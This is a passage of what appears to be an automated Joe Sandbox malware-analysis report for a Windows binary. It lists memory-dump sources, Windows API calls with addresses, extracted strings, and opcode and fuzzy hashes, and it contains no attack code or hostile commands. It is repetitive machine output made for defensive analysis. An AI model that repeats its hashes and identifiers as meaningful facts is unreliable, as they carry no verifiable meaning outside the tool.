                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00B9E5E8,00000004,00BE1CEC,00B9E86D), ref: 00B9E6CF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 401686933-2746444292
                                                                                                                    • Opcode ID: abbc3c7f4727ba6c072c705727ff5fc3b8ccebad4757074f717fc8abd0ea5248
                                                                                                                    • Instruction ID: 855eec604e6e7dc3c3d08840eb5640a546f33ddd9d82d9edeebed18af34af84f
                                                                                                                    • Opcode Fuzzy Hash: abbc3c7f4727ba6c072c705727ff5fc3b8ccebad4757074f717fc8abd0ea5248
                                                                                                                    • Instruction Fuzzy Hash: 9101F732600109ABDF14DE69DC49BDD7BEAEFC4324F0CC264ED29D7150EA38ED058680
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00BA8FB5
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BA8FBF
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00BA8FCC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3906539128-0
                                                                                                                    • Opcode ID: 0f1f02c2f6b512772fa64c5dc029dda1332cf83ff1f04b822070743b4c61218e
                                                                                                                    • Instruction ID: 6d744e67004a5d275401664556095f155eb578a511b8657e30c6966f5e3dbd24
                                                                                                                    • Opcode Fuzzy Hash: 0f1f02c2f6b512772fa64c5dc029dda1332cf83ff1f04b822070743b4c61218e
                                                                                                                    • Instruction Fuzzy Hash: 3E31C475901219ABCB21DF69DC89B9DBBF8EF08310F5042EAE41CA7250EB709F858F44
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .
                                                                                                                    • API String ID: 0-248832578
                                                                                                                    • Opcode ID: 79ff8f8178f7bba501bdc1c5c2b55d67cb9a3d204918ecffd592acaa46c38d79
                                                                                                                    • Instruction ID: cde90d2c449bb9bc895a01b64eceb9dd0ad4f35f7e444996bd8acdedb8f9ebb1
                                                                                                                    • Opcode Fuzzy Hash: 79ff8f8178f7bba501bdc1c5c2b55d67cb9a3d204918ecffd592acaa46c38d79
                                                                                                                    • Instruction Fuzzy Hash: 2331E6719042496FCF249E78CC84EFA7BFDDB86314F1441E8E92997253EB309D458B50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B9AF35
                                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,00BBE72C,?,?), ref: 00B9AF84
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2169056816-0
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00B86DDF,00000000,00000400), ref: 00B86C74
                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00B86C95
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    APIs
                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BB19EF,?,?,00000008,?,?,00BB168F,00000000), ref: 00BB1C21
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3997070919-0
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B9F66A
                                                                                                                    Similarity
                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2325560087-0
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00B8B16B
                                                                                                                    Similarity
                                                                                                                    • API ID: Version
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889659487-0
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: gj
                                                                                                                    • API String ID: 0-4203073231
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00B9F3A5), ref: 00B9F9DA
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 54951025-0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction ID: 459b24559c9e7aa0ea3e64a6550b4bf248f60b06c78e5aa0d1a23ac5237c17bd
                                                                                                                    • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction Fuzzy Hash: 5562A2716047849FCF25CF28C4906B9BBE1AF95304F1989BEE8EA8B346D734E945CB11
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction ID: 3f6b4307f0fbc007ec3e688571194d3b43f4898af203006550956d255040f153
                                                                                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction Fuzzy Hash: 7D62D6716583458FCF15CF28C8805A9BBE1FF99304F1889BDE89A8B346DB30E945CB15
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction ID: 2486b8a9e448b2fd639b72792197899831cd53ed893311bf99085be400d84dac
                                                                                                                    • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction Fuzzy Hash: 96524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: da925728413ae14d6ce36a9d6481c341a222219436de235c78e0374eabebc38a
                                                                                                                    • Instruction ID: beeaad1b26258a98c9c0d65d27253ecf3a4c4235deea5560f5f4bf33b356ffe0
                                                                                                                    • Opcode Fuzzy Hash: da925728413ae14d6ce36a9d6481c341a222219436de235c78e0374eabebc38a
                                                                                                                    • Instruction Fuzzy Hash: 8A12D1B06687068FCB18CF28C4D0A79B7E0FB94304F14897EE996C7781EB34A995CB45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd697888f0ff0c89e5f6758e52d0b7654967e22546e9824259c40b99dfc7c1b8
                                                                                                                    • Instruction ID: 0237c387efbd0ae18a15f3c4d018ef6d0c16f073732ae3ea8edd1ed8974323bc
                                                                                                                    • Opcode Fuzzy Hash: fd697888f0ff0c89e5f6758e52d0b7654967e22546e9824259c40b99dfc7c1b8
                                                                                                                    • Instruction Fuzzy Hash: B1F1ACB16083018FC719EF28C48462ABFE1FFCA314F645AAEF48597265D730E945CB62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 329ac89ec4df59ef8e92c8691bed39ff002a96cb61f3e2df6480c7e9beca46c7
                                                                                                                    • Instruction ID: ae6bfc78335f4334f42596f86277621cff11697dff2c520c56929319c619d4e4
                                                                                                                    • Opcode Fuzzy Hash: 329ac89ec4df59ef8e92c8691bed39ff002a96cb61f3e2df6480c7e9beca46c7
                                                                                                                    • Instruction Fuzzy Hash: 17D181B1A483458FDF14DF28C88475BBBE1EF89308F1845BDE8899B242D774E905CB96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: edb626a2c553d05657fd421bd2057d28a73b96dff38c9fd26bd9b556afcd0859
                                                                                                                    • Instruction ID: c5438ad88cf23238b248244391d2b5330027c924b853aa99cdf5f5b10ad2bf10
                                                                                                                    • Opcode Fuzzy Hash: edb626a2c553d05657fd421bd2057d28a73b96dff38c9fd26bd9b556afcd0859
                                                                                                                    • Instruction Fuzzy Hash: DEE144755083948FC314CF29D88086ABFF0AF9E300F49099EF9D497352D635EA59DBA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction ID: 107e9c8534a7f6c7dacf0f88da3d047f701d5b416f00139c5c8cf51ea9b1b865
                                                                                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction Fuzzy Hash: 849144B02143499BDF28EF74D891FBA77D5EBA0300F1009BDE59687282EB749946C762
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction ID: 3a6789debb338236cf951a64f6b87c1f525672977e156f3ac373b5d8ae5d9562
                                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction Fuzzy Hash: 288108B13043465BEF24DE68C8D1FBD77D4EBA5304F0049BDE9868B382DB648986C752
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00B8E30E
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                      • Part of subcall function 00B91DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00BC1030,00000200,00B8D928,00000000,?,00000050,00BC1030), ref: 00B91DC4
                                                                                                                    • _strlen.LIBCMT ref: 00B8E32F
                                                                                                                    • SetDlgItemTextW.USER32(?,00BBE274,?), ref: 00B8E38F
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B8E3C9
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00B8E3D5
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B8E475
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B8E4A2
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B8E4DB
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00B8E4E3
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00B8E4EE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B8E51B
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00B8E58D
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                    • String ID: $%s:$CAPTION$d
                                                                                                                    • API String ID: 2407758923-2512411981
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00BACB66
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC71E
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC730
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC742
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC754
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC766
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC778
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC78A
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC79C
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC7AE
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC7C0
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC7D2
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC7E4
                                                                                                                      • Part of subcall function 00BAC701: _free.LIBCMT ref: 00BAC7F6
                                                                                                                    • _free.LIBCMT ref: 00BACB5B
                                                                                                                      • Part of subcall function 00BA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34), ref: 00BA8DE2
                                                                                                                      • Part of subcall function 00BA8DCC: GetLastError.KERNEL32(00BB3A34,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34,00BB3A34), ref: 00BA8DF4
                                                                                                                    • _free.LIBCMT ref: 00BACB7D
                                                                                                                    • _free.LIBCMT ref: 00BACB92
                                                                                                                    • _free.LIBCMT ref: 00BACB9D
                                                                                                                    • _free.LIBCMT ref: 00BACBBF
                                                                                                                    • _free.LIBCMT ref: 00BACBD2
                                                                                                                    • _free.LIBCMT ref: 00BACBE0
                                                                                                                    • _free.LIBCMT ref: 00BACBEB
                                                                                                                    • _free.LIBCMT ref: 00BACC23
                                                                                                                    • _free.LIBCMT ref: 00BACC2A
                                                                                                                    • _free.LIBCMT ref: 00BACC47
                                                                                                                    • _free.LIBCMT ref: 00BACC5F
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 161543041-0
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00B99736
                                                                                                                    • _wcslen.LIBCMT ref: 00B997D6
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00B997E5
                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B99806
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B9982D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
